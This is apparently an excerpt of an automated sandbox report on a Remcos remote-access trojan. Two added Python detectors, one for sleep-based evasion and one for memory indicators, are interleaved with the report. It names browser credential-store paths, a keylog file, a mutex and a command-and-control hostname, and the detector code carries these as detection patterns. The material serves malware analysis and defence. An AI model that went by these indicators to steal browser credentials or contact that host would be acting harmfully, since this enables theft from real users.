                          Source: C:\Users\user\Desktop\1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da85346b6b949.dat-decoded.exeCode function: 1_2_0041BEEE LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,1_2_0041BEEE
                          Source: C:\Users\user\Desktop\1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da85346b6b949.dat-decoded.exeProcess information set: NOOPENFILEERRORBOX

                          Malware Analysis System Evasion

                          Source: C:\Users\user\Desktop\1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da85346b6b949.dat-decoded.exeCode function: 1_2_0040E627 Sleep,ExitProcess,1_2_0040E627
                          Source: C:\Users\user\Desktop\1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da85346b6b949.dat-decoded.exeCode function: OpenSCManagerA,EnumServicesStatusW,GetLastError,EnumServicesStatusW,OpenServiceW,QueryServiceConfigW,GetLastError,QueryServiceConfigW,CloseServiceHandle,CloseServiceHandle,1_2_00419AB8
                          Source: C:\Users\user\Desktop\1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da85346b6b949.dat-decoded.exeWindow / User API: threadDelayed 3568
                          Source: C:\Users\user\Desktop\1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da85346b6b949.dat-decoded.exeWindow / User API: threadDelayed 5936
                          Source: C:\Users\user\Desktop\1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da85346b6b949.dat-decoded.exeWindow / User API: foregroundWindowGot 1769
                          Source: C:\Users\user\Desktop\1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da85346b6b949.dat-decoded.exe TID: 7728Thread sleep count: 218 > 30
                          Source: C:\Users\user\Desktop\1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da85346b6b949.dat-decoded.exe TID: 7728Thread sleep time: -109000s >= -30000s
                          Source: C:\Users\user\Desktop\1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da85346b6b949.dat-decoded.exe TID: 7732Thread sleep count: 3568 > 30
                          Source: C:\Users\user\Desktop\1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da85346b6b949.dat-decoded.exe TID: 7732Thread sleep time: -10704000s >= -30000s
                          Source: C:\Users\user\Desktop\1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da85346b6b949.dat-decoded.exe TID: 7732Thread sleep count: 5936 > 30
                          Source: C:\Users\user\Desktop\1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da85346b6b949.dat-decoded.exe TID: 7732Thread sleep time: -17808000s >= -30000s
                          Source: C:\Users\user\Desktop\1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da85346b6b949.dat-decoded.exeCode function: 1_2_0040B335 FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose,1_2_0040B335
                          Source: C:\Users\user\Desktop\1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da85346b6b949.dat-decoded.exeCode function: 1_2_0040B53A FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose,1_2_0040B53A
                          Source: C:\Users\user\Desktop\1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da85346b6b949.dat-decoded.exeCode function: 1_2_0041B63A FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,FindClose,RemoveDirectoryW,GetLastError,FindClose,1_2_0041B63A
                          Source: C:\Users\user\Desktop\1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da85346b6b949.dat-decoded.exeCode function: 1_2_0044D7F9 FindFirstFileExA,1_2_0044D7F9
                          Source: C:\Users\user\Desktop\1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da85346b6b949.dat-decoded.exeCode function: 1_2_004089A9 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose,__CxxThrowException@8,1_2_004089A9
                          Source: C:\Users\user\Desktop\1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da85346b6b949.dat-decoded.exeCode function: 1_2_00406AC2 FindFirstFileW,FindNextFileW,1_2_00406AC2
                          Source: C:\Users\user\Desktop\1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da85346b6b949.dat-decoded.exeCode function: 1_2_00407A8C __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,__CxxThrowException@8,1_2_00407A8C
                          Source: C:\Users\user\Desktop\1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da85346b6b949.dat-decoded.exeCode function: 1_2_00408DA7 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,1_2_00408DA7
                          Source: C:\Users\user\Desktop\1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da85346b6b949.dat-decoded.exeCode function: 1_2_00418E5F FindFirstFileW,FindNextFileW,FindNextFileW,1_2_00418E5F
                          Source: C:\Users\user\Desktop\1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da85346b6b949.dat-decoded.exeCode function: 1_2_00406F06 SetEvent,GetFileAttributesW,DeleteFileW,ShellExecuteW,GetLogicalDriveStringsA,SetFileAttributesW,DeleteFileA,Sleep,StrToIntA,CreateDirectoryW,1_2_00406F06
                          Source: 1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da85346b6b949.dat-decoded.exe, 00000001.00000002.3753562886.00000000006A7000.00000004.00000020.00020000.00000000.sdmp, 1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da85346b6b949.dat-decoded.exe, 00000001.00000003.1335196684.00000000006A7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                          Source: 1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da85346b6b949.dat-decoded.exe, 00000001.00000002.3753451865.000000000062E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWh
                          Source: 1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da85346b6b949.dat-decoded.exe, 00000001.00000002.3753562886.00000000006A7000.00000004.00000020.00020000.00000000.sdmp, 1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da85346b6b949.dat-decoded.exe, 00000001.00000003.1335196684.00000000006A7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWg2
                          Source: C:\Users\user\Desktop\1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da85346b6b949.dat-decoded.exeAPI call chain: ExitProcess graph end nodegraph_1-48088
                          Source: C:\Users\user\Desktop\1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da85346b6b949.dat-decoded.exeCode function: 1_2_0043A86D IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,1_2_0043A86D
                          Source: C:\Users\user\Desktop\1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da85346b6b949.dat-decoded.exeCode function: 1_2_0041BEEE LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,1_2_0041BEEE
                          Source: C:\Users\user\Desktop\1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da85346b6b949.dat-decoded.exeCode function: 1_2_00442764 mov eax, dword ptr fs:[00000030h]1_2_00442764
                          Source: C:\Users\user\Desktop\1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da85346b6b949.dat-decoded.exeCode function: 1_2_0044EB3E GetProcessHeap,1_2_0044EB3E
                          Source: C:\Users\user\Desktop\1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da85346b6b949.dat-decoded.exeCode function: 1_2_00434378 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,1_2_00434378
                          Source: C:\Users\user\Desktop\1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da85346b6b949.dat-decoded.exeCode function: 1_2_0043A86D IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,1_2_0043A86D
                          Source: C:\Users\user\Desktop\1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da85346b6b949.dat-decoded.exeCode function: 1_2_00433D4F IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,1_2_00433D4F
                          Source: C:\Users\user\Desktop\1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da85346b6b949.dat-decoded.exeCode function: 1_2_00433EE2 SetUnhandledExceptionFilter,1_2_00433EE2
                          Source: C:\Users\user\Desktop\1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da85346b6b949.dat-decoded.exeCode function: GetCurrentProcessId,OpenMutexA,CloseHandle,CreateThread,CloseHandle,Sleep,OpenProcess, svchost.exe1_2_0041100E
                          Source: C:\Users\user\Desktop\1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da85346b6b949.dat-decoded.exeCode function: 1_2_0041894A mouse_event,1_2_0041894A
                          Source: 1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da85346b6b949.dat-decoded.exe, 00000001.00000002.3753562886.00000000006A0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Manager|
                          Source: 1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da85346b6b949.dat-decoded.exe, 00000001.00000002.3753562886.00000000006A0000.00000004.00000020.00020000.00000000.sdmp, 1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da85346b6b949.dat-decoded.exe, 00000001.00000002.3753451865.000000000062E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Manager
                          Source: 1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da85346b6b949.dat-decoded.exe, 00000001.00000002.3753451865.0000000000692000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program ManagerNY\EZ
                          Source: 1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da85346b6b949.dat-decoded.exe, 00000001.00000002.3753451865.0000000000692000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program ManagerNY\12\Z
                          Source: 1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da85346b6b949.dat-decoded.exe, 00000001.00000002.3753451865.0000000000692000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program ManagerNY\
                          Source: 1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da85346b6b949.dat-decoded.exe, 00000001.00000002.3753451865.0000000000692000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program ManagerNY\WZ
                          Source: 1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da85346b6b949.dat-decoded.exe, 00000001.00000002.3753451865.0000000000692000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program ManagerNY\xZv
                          Source: 1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da85346b6b949.dat-decoded.exe, 00000001.00000002.3753451865.0000000000671000.00000004.00000020.00020000.00000000.sdmp, 1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da85346b6b949.dat-decoded.exe, 00000001.00000002.3753451865.000000000062E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: |Program Manager|
                          Source: 1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da85346b6b949.dat-decoded.exe, 00000001.00000002.3753451865.0000000000692000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program ManagerNY\08
                          Source: 1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da85346b6b949.dat-decoded.exe, 00000001.00000002.3753562886.00000000006A0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Managerf
                          Source: 1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da85346b6b949.dat-decoded.exe, 00000001.00000002.3753562886.00000000006A0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Manager
                          Source: 1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da85346b6b949.dat-decoded.exe, 00000001.00000002.3753451865.000000000062E000.00000004.00000020.00020000.00000000.sdmp, logs.dat.1.drBinary or memory string: [Program Manager]
                          Source: C:\Users\user\Desktop\1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da85346b6b949.dat-decoded.exeCode function: 1_2_00434015 cpuid 1_2_00434015
                          Source: C:\Users\user\Desktop\1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da85346b6b949.dat-decoded.exeCode function: GetLocaleInfoA,1_2_0040E751
                          Source: C:\Users\user\Desktop\1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da85346b6b949.dat-decoded.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,1_2_0045107A
                          Source: C:\Users\user\Desktop\1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da85346b6b949.dat-decoded.exeCode function: GetLocaleInfoW,1_2_004512CA
                          Source: C:\Users\user\Desktop\1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da85346b6b949.dat-decoded.exeCode function: EnumSystemLocalesW,1_2_004472BE
                          Source: C:\Users\user\Desktop\1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da85346b6b949.dat-decoded.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,1_2_004513F3
                          Source: C:\Users\user\Desktop\1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da85346b6b949.dat-decoded.exeCode function: GetLocaleInfoW,1_2_004514FA
                          Source: C:\Users\user\Desktop\1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da85346b6b949.dat-decoded.exeCode function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,1_2_004515C7
                          Source: C:\Users\user\Desktop\1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da85346b6b949.dat-decoded.exeCode function: GetLocaleInfoW,1_2_004477A7
                          Source: C:\Users\user\Desktop\1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da85346b6b949.dat-decoded.exeCode function: IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW,1_2_00450C8F
                          Source: C:\Users\user\Desktop\1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da85346b6b949.dat-decoded.exeCode function: EnumSystemLocalesW,1_2_00450F52
                          Source: C:\Users\user\Desktop\1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da85346b6b949.dat-decoded.exeCode function: EnumSystemLocalesW,1_2_00450F07
                          Source: C:\Users\user\Desktop\1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da85346b6b949.dat-decoded.exeCode function: EnumSystemLocalesW,1_2_00450FED
                          Source: C:\Users\user\Desktop\1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da85346b6b949.dat-decoded.exeCode function: 1_2_00404915 GetLocalTime,CreateEventA,CreateThread,1_2_00404915
                          Source: C:\Users\user\Desktop\1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da85346b6b949.dat-decoded.exeCode function: 1_2_0041A9AD GetComputerNameExW,GetUserNameW,1_2_0041A9AD
                          Source: C:\Users\user\Desktop\1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da85346b6b949.dat-decoded.exeCode function: 1_2_0044804A _free,_free,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,_free,1_2_0044804A
                          Source: C:\Users\user\Desktop\1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da85346b6b949.dat-decoded.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
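The thread-sleep entries in this section are the sandbox's stalling heuristic: a thread is reported once it has called Sleep more than 30 times or for 30 000 ms in total (the report prints milliseconds with an "s" suffix), and a Sleep immediately followed by ExitProcess is reported separately as a delayed program exit. The following is an added Python example, not Joe Sandbox code, that replays that rule over an API-call trace so the same finding can be reproduced from your own hooking or ETW output. The trace format ("<tid> <Api>(<arg>)") and the trace itself are constructed here; the counts (218 calls on one thread, 3 568 on another) are chosen to echo the numbers in the report, and the thresholds are assumed to be the whole rule.

```python
import re
from collections import defaultdict

# Thresholds read off the report's own lines ("count: 218 > 30",
# "time: -109000s >= -30000s"). Assumed to be the complete rule.
SLEEP_COUNT_LIMIT = 30
SLEEP_MS_LIMIT = 30_000

# Constructed trace line format: "<tid> <Api>(<arg>)". Not a Joe Sandbox format.
_LINE = re.compile(r"^(?P<tid>\d+)\s+(?P<api>\w+)\((?P<arg>[^)]*)\)$")


def parse_trace(text):
    """Parse trace lines into (tid, api, arg) tuples; reject anything malformed."""
    events = []
    for line in text.splitlines():
        line = line.strip()
        if not line:
            continue
        m = _LINE.match(line)
        if not m:
            raise ValueError(f"unparseable trace line: {line!r}")
        events.append((int(m["tid"]), m["api"], m["arg"]))
    return events


def sleep_profile(events):
    """Per-thread Sleep call count and cumulative requested milliseconds."""
    prof = defaultdict(lambda: {"count": 0, "total_ms": 0})
    for tid, api, arg in events:
        if api == "Sleep":
            prof[tid]["count"] += 1
            prof[tid]["total_ms"] += int(arg)
    return dict(prof)


def find_evasion(events):
    """Findings in the report's style: stalling threads and Sleep -> ExitProcess."""
    findings = []
    for tid, p in sorted(sleep_profile(events).items()):
        if p["count"] > SLEEP_COUNT_LIMIT:
            findings.append(f"TID {tid} thread sleep count: {p['count']} > {SLEEP_COUNT_LIMIT}")
        if p["total_ms"] >= SLEEP_MS_LIMIT:
            findings.append(f"TID {tid} thread sleep time: {p['total_ms']}ms >= {SLEEP_MS_LIMIT}ms")
    # Delayed exit: ExitProcess whose immediately preceding call on the same thread was Sleep.
    last_api = {}
    for tid, api, _ in events:
        if api == "ExitProcess" and last_api.get(tid) == "Sleep":
            findings.append(f"TID {tid} delayed program exit: Sleep,ExitProcess")
        last_api[tid] = api
    return findings


def constructed_trace():
    """Constructed trace echoing the report's counts; not a capture from the sample."""
    lines = ["7704 CreateMutexA(Rmc-JLQBNY)", "7704 OpenSCManagerA(0)"]
    lines += ["7728 Sleep(500)"] * 218      # 218 calls, 109 000 ms total
    lines += ["7732 Sleep(3000)"] * 3568    # 3 568 calls, 10 704 000 ms total
    lines += ["7704 Sleep(60000)", "7704 ExitProcess(0)"]
    return "\n".join(lines)


if __name__ == "__main__":
    for finding in find_evasion(parse_trace(constructed_trace())):
        print(finding)
```

Note that the rule counts requested sleep time, not wall-clock time: a sandbox that patches Sleep to return immediately still sees the requested milliseconds, which is why the report can show a thread "sleeping" for 10 704 000 ms inside a 240 s run.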

                          Stealing of Sensitive Information

Source: Yara match | File source: 1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da85346b6b949.dat-decoded.exe, type: SAMPLE
Source: Yara match | File source: 1.0.1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da85346b6b949.dat-decoded.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.2.1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da85346b6b949.dat-decoded.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000001.00000002.3753688291.000000000228F000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000002.3753451865.0000000000671000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000002.3753278972.0000000000458000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000000.1312795362.0000000000458000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000002.3753451865.000000000062E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: 1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da85346b6b949.dat-decoded.exe PID: 7704, type: MEMORYSTR
Source: Yara match | File source: C:\ProgramData\remcos\logs.dat, type: DROPPED
Source: C:\Users\user\Desktop\1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da85346b6b949.dat-decoded.exe | Code function: \AppData\Local\Google\Chrome\User Data\Default\Login Data 1_2_0040B21B
Source: C:\Users\user\Desktop\1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da85346b6b949.dat-decoded.exe | Code function: \AppData\Roaming\Mozilla\Firefox\Profiles\ 1_2_0040B335
Source: C:\Users\user\Desktop\1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da85346b6b949.dat-decoded.exe | Code function: \key3.db 1_2_0040B335

                          Remote Access Functionality

Source: C:\Users\user\Desktop\1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da85346b6b949.dat-decoded.exe | Mutex created: \Sessions\1\BaseNamedObjects\Rmc-JLQBNY
Source: Yara match | File source: 1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da85346b6b949.dat-decoded.exe, type: SAMPLE
Source: Yara match | File source: 1.0.1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da85346b6b949.dat-decoded.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.2.1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da85346b6b949.dat-decoded.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000001.00000002.3753688291.000000000228F000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000002.3753451865.0000000000671000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000002.3753278972.0000000000458000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000000.1312795362.0000000000458000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000002.3753451865.000000000062E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: 1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da85346b6b949.dat-decoded.exe PID: 7704, type: MEMORYSTR
Source: Yara match | File source: C:\ProgramData\remcos\logs.dat, type: DROPPED
Source: C:\Users\user\Desktop\1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da85346b6b949.dat-decoded.exe | Code function: cmd.exe 1_2_00405042
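The strings this section and the Stealing of Sensitive Information section record (the Rmc- mutex name, the C:\ProgramData\remcos\logs.dat keylog file, the geoplugin.net/json.gp lookup, the Chrome "Login Data" and Firefox "key3.db" paths, the "Hyper-V RAW" and "[Program Manager]" memory strings) are the indicators an analyst would carry over to a process-memory or disk-image triage. Below is an added Python example of such a triage scanner; it is not Joe Sandbox, Yara or Remcos code. The regexes are written here from the observations above; generalising the observed Rmc-JLQBNY to an "Rmc-" prefix with at least six characters, searching UTF-16LE as well as ASCII (Remcos uses both the A and W file APIs in this report), and the final verdict rule are assumptions. The memory image it scans is constructed inline.

```python
import re

# Indicator patterns derived from the strings in this report. Byte regexes, so the same
# pattern can be run over raw ASCII bytes and over de-interleaved UTF-16LE runs.
INDICATORS = {
    "remcos_mutex":      rb"Rmc-[A-Z0-9]{6,}",                 # observed: Rmc-JLQBNY (suffix length assumed)
    "remcos_keylog":     rb"\\ProgramData\\remcos\\logs\.dat",
    "geoplugin_lookup":  rb"geoplugin\.net/json\.gp",
    "chrome_login_data": rb"\\Google\\Chrome\\User Data\\Default\\Login Data",
    "firefox_key3":      rb"\\Mozilla\\Firefox\\Profiles\\|key3\.db",
    "hyperv_check":      rb"Hyper-V RAW",
    "keylog_window":     rb"\[Program Manager\]",
    "c2_host":           rb"juanosorio\.loseyourip\.com",
}


def _wide_runs(blob):
    """Yield (offset, narrow_bytes) for each run of >= 6 printable UTF-16LE characters."""
    for m in re.finditer(rb"(?:[\x20-\x7e]\x00){6,}", blob):
        yield m.start(), m.group()[::2]


def scan(blob):
    """Return every indicator hit as {name, offset, encoding, text}, ordered by offset."""
    hits = []
    runs = list(_wide_runs(blob))
    for name, pat in INDICATORS.items():
        rx = re.compile(pat)
        for m in rx.finditer(blob):
            hits.append({"name": name, "offset": m.start(), "encoding": "ascii",
                         "text": m.group().decode("latin-1")})
        for start, narrow in runs:
            for m in rx.finditer(narrow):
                hits.append({"name": name, "offset": start + 2 * m.start(),
                             "encoding": "utf-16le", "text": m.group().decode("latin-1")})
    hits.sort(key=lambda h: h["offset"])
    return hits


def classify(hits):
    """Assumed triage rule: mutex plus any Remcos-specific artefact -> remcos."""
    names = {h["name"] for h in hits}
    if "remcos_mutex" in names and names & {"remcos_keylog", "geoplugin_lookup", "c2_host"}:
        return "remcos"
    return "suspicious" if names else "clean"


def constructed_dump():
    """Constructed memory image: a few of the report's strings, narrow and wide. Not real sample memory."""
    narrow = (b"\x00" * 16 + b"Rmc-JLQBNY\x00" + b"http://geoplugin.net/json.gp\x00"
              + b"C:\\ProgramData\\remcos\\logs.dat\x00" + b"[Program Manager]\x00")
    wide = ("\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Login Data\x00"
            "key3.db\x00").encode("utf-16le")
    return narrow + b"\xff" * 8 + wide + b"\x00" * 8


if __name__ == "__main__":
    found = scan(constructed_dump())
    for h in found:
        print(f"{h['offset']:#08x} {h['encoding']:8} {h['name']:18} {h['text']}")
    print("verdict:", classify(found))
```

The wide-string pass matters in practice: the "Login Data" path is handled by the W-suffixed file APIs in this sample, so an ASCII-only grep over a dump will miss it while the mutex and geoplugin strings still match.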
MITRE ATT&CK Matrix (techniques with signature hits for this sample; the number in parentheses is the hit badge as printed in the report; all other cells of the matrix were empty)

Execution: Native API (1); Command and Scripting Interpreter (12); Service Execution (2)
Persistence: DLL Side-Loading (1); Windows Service (1)
Privilege Escalation: DLL Side-Loading (1); Bypass User Account Control (1); Access Token Manipulation (1); Windows Service (1); Process Injection (11)
Defense Evasion: Deobfuscate/Decode Files or Information (1); Obfuscated Files or Information (2); DLL Side-Loading (1); Bypass User Account Control (1); Masquerading (1); Virtualization/Sandbox Evasion (1); Access Token Manipulation (1); Process Injection (11)
Credential Access: OS Credential Dumping (1); Input Capture (211); Credentials In Files (2)
Discovery: System Time Discovery (2); Account Discovery (1); System Service Discovery (1); File and Directory Discovery (2); System Information Discovery (23); Security Software Discovery (21); Virtualization/Sandbox Evasion (1); Process Discovery (2); Application Window Discovery (1); System Owner/User Discovery (1)
Collection: Archive Collected Data (11); Input Capture (211); Clipboard Data (3)
Command and Control: Ingress Tool Transfer (12); Encrypted Channel (2); Non-Standard Port (1); Remote Access Software (1); Non-Application Layer Protocol (2); Application Layer Protocol (12)
Impact: System Shutdown/Reboot (1); Defacement (1)
Reconnaissance, Resource Development, Initial Access, Lateral Movement, Exfiltration: no hits

Source | Detection | Scanner | Label
